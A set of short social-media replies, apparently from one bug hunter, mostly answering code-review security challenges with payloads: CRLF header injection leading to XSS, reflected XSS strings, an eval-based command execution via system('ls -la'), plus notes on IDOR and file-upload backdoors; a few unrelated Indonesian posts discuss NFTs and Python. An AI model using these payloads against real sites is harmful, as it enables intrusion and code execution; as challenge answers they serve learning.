@intigriti CRLF but possible lead to xss,
maybe with this payload :
locale_redirect.php?locale=%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
@Sisi0_x $id actually you can enumerate id. so it's possible to IDOR (file.php?id=1)
I think you already used prepare statement, so it's hard to do SQL injection
the other bugs are when u display the data at line 18, XSS (reflected)
file.php?id="><svg onload=alert(1)>
@gmaazs @0xrebus @irwndfrry @ariesyuangga@ArnoldPoernomo keknya valid, gw check dari twit ini
https://t.co/OAPAn9uXJn
gw compare di etherscan, match si nft nya sesuai
https://t.co/TDVZy32Xsg
@den_mas@lynxluna saya lebih pilih python si karena dari language nya lebih manusiawi di baca dan klo buat web dev ada framework seperti django, flask.
atau ada alternatif lain misal ruby , itu jg oke.
@Hac10101 arbitrary file upload, an attacker able to upload such as file PHP backdoors will lead to RCE. For fixing the code needs to be validated so the extension file will be allowed to upload & csrf token.
@intigriti I think there are 3 bugs
1. [compile error] on echo "<h1>answer: " --> need ; so the php code not execute.
2. [xss[ x.php?e1=5%3Cimg/src/onerror=alert(document.location)%3E&op=-&e2=2
3. [rce]x.php?e1=1;system("ls%20-la")
you know what? eval is evil haha
@intigriti just convert the < & > into hex, then call by `onerror` event , because when it renders the invalid image it will trigger the onerror . the payload should be like this `?error_msg=\x3Cimg\x20src=xx\x20onerror=alert(window.origin)\x3E`